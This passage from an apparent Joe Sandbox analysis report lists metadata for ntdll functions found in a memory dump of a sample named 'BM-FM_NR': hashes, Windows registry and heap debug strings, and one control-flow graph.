                                                                      • Opcode ID: 17bc186dbf9b9788eb1314a1cac79305d52a7c94cbb1c796c4a29f34e3d5a239
                                                                      • Instruction ID: be2c73e9a498f0522b107a1cf50fa3207515ca74cb257c163003303baa559446
                                                                      • Opcode Fuzzy Hash: 17bc186dbf9b9788eb1314a1cac79305d52a7c94cbb1c796c4a29f34e3d5a239
                                                                      • Instruction Fuzzy Hash: 683211B5A083819FE750DF69C884B9BBBE5BF88348F00492EF59987250D774E948CF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 36B85EDD
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 36B85B61
                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 36B85604
                                                                      • PreferredUILanguagesPending, xrefs: 36B85D52
                                                                      • Control Panel\Desktop, xrefs: 36B85CDE
                                                                      • InstallLanguageFallback, xrefs: 36B85BD0
                                                                      • PreferredUILanguages, xrefs: 36B85F51
                                                                      • @, xrefs: 36B85F20
                                                                      • @, xrefs: 36B85DF7
                                                                      • @, xrefs: 36B85FFA
                                                                      • LanguageConfigurationPending, xrefs: 36B85DA1
                                                                      • LanguageConfiguration, xrefs: 36B85FA0
                                                                      • @, xrefs: 36B85BA7
                                                                      • @, xrefs: 36B85D30
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                      • API String ID: 0-1325123933
                                                                      • Opcode ID: d58b7b5d1c4c2f00a92621d72f9e0c046a57091751a23d0857e51eb91de42692
                                                                      • Instruction ID: 7e774d2d5a715504c4db1b1b6034fb9a6facdd56ce25867a71d6a7a50f45abb9
                                                                      • Opcode Fuzzy Hash: d58b7b5d1c4c2f00a92621d72f9e0c046a57091751a23d0857e51eb91de42692
                                                                      • Instruction Fuzzy Hash: 0E7237B69083919FD351CF29C880BABB7E9FB88754F40492DF99997250EB34D805CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1029 36b8fdf4-36b8fe16 call 36b37be4 1032 36b8fe18-36b8fe30 RtlDebugPrintTimes 1029->1032 1033 36b8fe35-36b8fe4d call 36ad7662 1029->1033 1037 36b902d1-36b902e0 1032->1037 1038 36b8fe53-36b8fe69 1033->1038 1039 36b90277 1033->1039 1040 36b8fe6b-36b8fe6e 1038->1040 1041 36b8fe70-36b8fe72 1038->1041 1042 36b9027a-36b902ce call 36b902e6 1039->1042 1044 36b8fe73-36b8fe8a 1040->1044 1041->1044 1042->1037 1046 36b90231-36b9023a GetPEB 1044->1046 1047 36b8fe90-36b8fe93 1044->1047 1049 36b90259-36b9025e call 36adb910 1046->1049 1050 36b9023c-36b90257 GetPEB call 36adb910 1046->1050 1047->1046 1051 36b8fe99-36b8fea2 1047->1051 1058 36b90263-36b90274 call 36adb910 1049->1058 1050->1058 1054 36b8febe-36b8fed1 call 36b90835 1051->1054 1055 36b8fea4-36b8febb call 36aefed0 1051->1055 1063 36b8fedc-36b8fef0 call 36ad753f 1054->1063 1064 36b8fed3-36b8feda 1054->1064 1055->1054 1058->1039 1068 36b90122-36b90127 1063->1068 1069 36b8fef6-36b8ff02 GetPEB 1063->1069 1064->1063 1068->1042 1072 36b9012d-36b90139 GetPEB 1068->1072 1070 36b8ff70-36b8ff7b 1069->1070 1071 36b8ff04-36b8ff07 1069->1071 1073 36b90068-36b9007a call 36af2710 1070->1073 1074 36b8ff81-36b8ff88 1070->1074 1075 36b8ff09-36b8ff24 GetPEB call 36adb910 1071->1075 1076 36b8ff26-36b8ff2b call 36adb910 1071->1076 1077 36b9013b-36b9013e 1072->1077 1078 36b901a7-36b901b2 1072->1078 1096 36b90110-36b9011d call 36b90d24 call 36b90835 1073->1096 1097 36b90080-36b90087 1073->1097 1074->1073 1080 36b8ff8e-36b8ff97 1074->1080 1093 36b8ff30-36b8ff51 call 36adb910 GetPEB 1075->1093 1076->1093 1083 36b9015d-36b90162 call 36adb910 1077->1083 1084 36b90140-36b9015b GetPEB call 36adb910 1077->1084 1078->1042 1081 36b901b8-36b901c3 1078->1081 1088 36b8ffb8-36b8ffbc 1080->1088 1089 36b8ff99-36b8ffa9 1080->1089 1081->1042 1090 36b901c9-36b901d4 1081->1090 1095 36b90167-36b9017b call 36adb910 1083->1095 1084->1095 1100 36b8ffce-36b8ffd4 1088->1100 1101 36b8ffbe-36b8ffcc call 36b13ae9 1088->1101 1089->1088 1098 36b8ffab-36b8ffb5 call 36b9d646 1089->1098 1090->1042 1099 36b901da-36b901e3 GetPEB 1090->1099 1093->1073 1115 36b8ff57-36b8ff6b 1093->1115 1127 36b9017e-36b90188 GetPEB 1095->1127 1096->1068 1105 36b90089-36b90090 1097->1105 1106 36b90092-36b9009a 1097->1106 1098->1088 1109 36b90202-36b90207 call 36adb910 1099->1109 1110 36b901e5-36b90200 GetPEB call 36adb910 1099->1110 1112 36b8ffd7-36b8ffe0 1100->1112 1101->1112 1105->1106 1117 36b900b8-36b900bc 1106->1117 1118 36b9009c-36b900ac 1106->1118 1124 36b9020c-36b9022c call 36b8823a call 36adb910 1109->1124 1110->1124 1113 36b8fff2-36b8fff5 1112->1113 1114 36b8ffe2-36b8fff0 1112->1114 1125 36b90065 1113->1125 1126 36b8fff7-36b8fffe 1113->1126 1114->1113 1115->1073 1130 36b900ec-36b900f2 1117->1130 1131 36b900be-36b900d1 call 36b13ae9 1117->1131 1118->1117 1128 36b900ae-36b900b3 call 36b9d646 1118->1128 1124->1127 1125->1073 1126->1125 1134 36b90000-36b9000b 1126->1134 1127->1042 1136 36b9018e-36b901a2 1127->1136 1128->1117 1135 36b900f5-36b900fc 1130->1135 1146 36b900e3 1131->1146 1147 36b900d3-36b900e1 call 36b0fdb9 1131->1147 1134->1125 1140 36b9000d-36b90016 GetPEB 1134->1140 1135->1096 1141 36b900fe-36b9010e 1135->1141 1136->1042 1144 36b90018-36b90033 GetPEB call 36adb910 1140->1144 1145 36b90035-36b9003a call 36adb910 1140->1145 1141->1096 1155 36b9003f-36b9005d call 36b8823a call 36adb910 1144->1155 1145->1155 1148 36b900e6-36b900ea 1146->1148 1147->1148 1148->1135 1155->1125
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                      • API String ID: 3446177414-1700792311
                                                                      • Opcode ID: d091f5f8c0912806dd1b35aea736566b78f7ef582739a2b5e84235d5f5513ae9
                                                                      • Instruction ID: 4eedffcfce2c743df6b1098fa0ba3636c6064a7067d15db2ca366bfbb921b245
                                                                      • Opcode Fuzzy Hash: d091f5f8c0912806dd1b35aea736566b78f7ef582739a2b5e84235d5f5513ae9
                                                                      • Instruction Fuzzy Hash: 06D1CF79900695EFDB01CFA4C850AEABBF2FF5A754F0480ADE844AB262C739D941CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                      • API String ID: 3446177414-1745908468
                                                                      • Opcode ID: 1eaaa593e22898c021e045f1deb0f5e73dd9eb49cd95d369533e164495cd7d57
                                                                      • Instruction ID: 4943578917f142952d8c88f11d4d7566b78f2fa07641303f77f3f259da751aab
                                                                      • Opcode Fuzzy Hash: 1eaaa593e22898c021e045f1deb0f5e73dd9eb49cd95d369533e164495cd7d57
                                                                      • Instruction Fuzzy Hash: 3E912F799006D5EFDB11DFB8C850A9DBBF6FF49390F148099E840AB251CB3A9941CF12
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                      • API String ID: 0-3532704233
                                                                      • Opcode ID: 24743d1fe44b2c4be41ca7617a951ffd0a4c8a7286e184891e542fed852c2d74
                                                                      • Instruction ID: b4b042e812e04f4c8d3c0f868e693aa27f4fa73a040dd80c0310f7cb134446d0
                                                                      • Opcode Fuzzy Hash: 24743d1fe44b2c4be41ca7617a951ffd0a4c8a7286e184891e542fed852c2d74
                                                                      • Instruction Fuzzy Hash: B1B168B6919355DFD711DF28C890A5FBBE8EB88748F51492EF88897200DB70D908CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlDebugPrintTimes.NTDLL ref: 36B0D879
                                                                        • Part of subcall function 36AE4779: RtlDebugPrintTimes.NTDLL ref: 36AE4817
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 3446177414-1975516107
                                                                      • Opcode ID: 6db9f0981520eda32c106ce50057105ce0fd5bc59d2bfb92fd96b39150403c7d
                                                                      • Instruction ID: fe48f6dc106dc30e634b14fe384ac4b75d7f6d395000ffeebb76f0f2e2ae4bf7
                                                                      • Opcode Fuzzy Hash: 6db9f0981520eda32c106ce50057105ce0fd5bc59d2bfb92fd96b39150403c7d
                                                                      • Instruction Fuzzy Hash: EA51DC76E043559FEB04DFA4C954B9DBFB2FF44348F205059D900AB281EB79A882CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 36ADD263
                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 36ADD0E6
                                                                      • @, xrefs: 36ADD2B3
                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 36ADD06F
                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 36ADD202
                                                                      • @, xrefs: 36ADD09D
                                                                      • @, xrefs: 36ADD24F
                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 36ADD136
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                      • API String ID: 0-1356375266
                                                                      • Opcode ID: 5202aaa8647af47c97c093a65b23b5985f44606e7de0985cfe32732b7508fd7a
                                                                      • Instruction ID: b994c5add99abeef4538d3f798adb63e54e8de0890dc8352f1a6a3fc5860fb20
                                                                      • Opcode Fuzzy Hash: 5202aaa8647af47c97c093a65b23b5985f44606e7de0985cfe32732b7508fd7a
                                                                      • Instruction Fuzzy Hash: 0DA135B1908315DFE321DF25C850B9BB7E8BB84759F11492EFA9896240D774D908CFA3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                      • API String ID: 0-2224505338
                                                                      • Opcode ID: cad920bdc9ac40c3bd7f4d2a1dc96ff6939ddee20daeb56526e6336a2e4db6a9
                                                                      • Instruction ID: 0a60cfddf6f932adae257c91283d926c252ec733a1907808d209947b68a1cc45
                                                                      • Opcode Fuzzy Hash: cad920bdc9ac40c3bd7f4d2a1dc96ff6939ddee20daeb56526e6336a2e4db6a9
                                                                      • Instruction Fuzzy Hash: 5551FF7A5022D4EFEB41CFA4C994E5ABBF8FF086E4F118499ED019B221CA39D950CE51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-523794902
                                                                      • Opcode ID: a86752c1b32e6059ef632466df383913e679b64c042c9f05bc543dcdfeca3151
                                                                      • Instruction ID: 41e5e7ba6c3ab61eb4ba6831cf8d27c6f95294ec3e1aec062f35fa6566f3eb36
                                                                      • Opcode Fuzzy Hash: a86752c1b32e6059ef632466df383913e679b64c042c9f05bc543dcdfeca3151
                                                                      • Instruction Fuzzy Hash: 55420EB56153919FE300CF25C9A0A1BBBE5FF88288F24496EF8958B351DB34D845CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                      • API String ID: 0-122214566
                                                                      • Opcode ID: de8f251377695bbcf959ec3d7009a6fe9c1845d354f5244401b718f3a72a02d7
                                                                      • Instruction ID: 36a71c50f8dbcfadc60632ad1765c61f2a0703d955448907d7ec5b1b683dc10b
                                                                      • Opcode Fuzzy Hash: de8f251377695bbcf959ec3d7009a6fe9c1845d354f5244401b718f3a72a02d7
                                                                      • Instruction Fuzzy Hash: 21C10275E10325ABEB058B65CC90BBEBBF5AF45344F6441A9FC019F290DB76C844C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-4253913091
                                                                      • Opcode ID: d6f918b5e7bbd06633bf9861679f211ede6708e94ac58dbddf75516632ac06b1
                                                                      • Instruction ID: 325faa6024f539b742d974855fc99f4431ecefa8133fa419f6941818ef8ae207
                                                                      • Opcode Fuzzy Hash: d6f918b5e7bbd06633bf9861679f211ede6708e94ac58dbddf75516632ac06b1
                                                                      • Instruction Fuzzy Hash: 14F1AA75A10615DFEB05CF68CCA0B6AB7B5FB44344F2081A8E8059F381DB35E981DFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 3446177414-2283098728
                                                                      • Opcode ID: c4058379718b7e079055c27e746214af49aee8094b6973728d50f5c751565a8c
                                                                      • Instruction ID: 63a057aa79d7955acfac8829befae6d8885d4041852faed2cc21ac3dd80828be
                                                                      • Opcode Fuzzy Hash: c4058379718b7e079055c27e746214af49aee8094b6973728d50f5c751565a8c
                                                                      • Instruction Fuzzy Hash: 5151FD76A04311ABE710FF38CC80A1ABFA1FB84354F14266DE9519B291EB34E805CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Kernel-MUI-Language-SKU, xrefs: 36B0534B
                                                                      • Kernel-MUI-Language-Allowed, xrefs: 36B0519B
                                                                      • WindowsExcludedProcs, xrefs: 36B0514A
                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 36B05272
                                                                      • Kernel-MUI-Number-Allowed, xrefs: 36B05167
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                      • API String ID: 0-258546922
                                                                      • Opcode ID: 63ff581abeb0e5e679a12bcfec5684a20a76ce39fb91d2736beb031dd62cd741
                                                                      • Instruction ID: f068fa82d270333e9390c1aecb7fed3c685198742a6128f53e73c70489f9533d
                                                                      • Opcode Fuzzy Hash: 63ff581abeb0e5e679a12bcfec5684a20a76ce39fb91d2736beb031dd62cd741
                                                                      • Instruction Fuzzy Hash: E6F13BB6D10229EFDB11DFA9C980EDEBBB8FF08650F51045AE505A7610EB719E01CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: d529547bc2d9f0eaa7c551b9b31520b6ad329d2ec1fa85e50731d582cdf96b50
                                                                      • Instruction ID: 3afa1b949d1b9ba0f6fa731ee44ed969745666504961453feb1a44f7f728dbed
                                                                      • Opcode Fuzzy Hash: d529547bc2d9f0eaa7c551b9b31520b6ad329d2ec1fa85e50731d582cdf96b50
                                                                      • Instruction Fuzzy Hash: 6AF1E472E006219BDF08CF69C9A067EBFF6EF88240B69416DD856EB380D674E941CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                      • API String ID: 0-3061284088
                                                                      • Opcode ID: fd7e63785cfe70a9af30ac343a84922bf00fbe519a91d587b4f861fe0e436931
                                                                      • Instruction ID: 04b5f40139db96f373631117d0772b905f12220d61eb9f3443a31eb11ad705c6
                                                                      • Opcode Fuzzy Hash: fd7e63785cfe70a9af30ac343a84922bf00fbe519a91d587b4f861fe0e436931
                                                                      • Instruction Fuzzy Hash: 13014C76516290EEE3058739D92DF427BF8EB41771F35408EEC044BAA1CFA9D844DE61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                      • API String ID: 0-2586055223
                                                                      • Opcode ID: a676df2f0ee73d2843bcaf863392e9510169a19e6ac037d66530512a2fa7b196
                                                                      • Instruction ID: 7d2492a02f5ec21a99728d69ae4c6191016d91e650bd6bf739e665e665ac237f
                                                                      • Opcode Fuzzy Hash: a676df2f0ee73d2843bcaf863392e9510169a19e6ac037d66530512a2fa7b196
                                                                      • Instruction Fuzzy Hash: 2A6144756057A0AFE311CB24CD64F5BB7E8EF80794F15046AFD548B291CB34E805CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                      • API String ID: 0-1391187441
                                                                      • Opcode ID: 52f8a4c9e70cbb07237103402edb6d4e69fd744c32597f9ac85421adf2523eb6
                                                                      • Instruction ID: 3170aa7d888b914a95d59e27c773fb365f6da9b7fb6613b6d37928c248b3c664
                                                                      • Opcode Fuzzy Hash: 52f8a4c9e70cbb07237103402edb6d4e69fd744c32597f9ac85421adf2523eb6
                                                                      • Instruction Fuzzy Hash: CD31B276A01219EFDB41DB65CC84F9ABBF8FB457A0F2140A5FC14AB291D734E940CE61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                      • API String ID: 0-1880532218
                                                                      • Opcode ID: f6875f1c0be60a9c721b8f0c0f45ea081444ff61e734471bc05f446edff25abd
                                                                      • Instruction ID: 26925d8a2625f828fecafd04f7c70193ad65e97d4871bb699083c49b88fa5e06
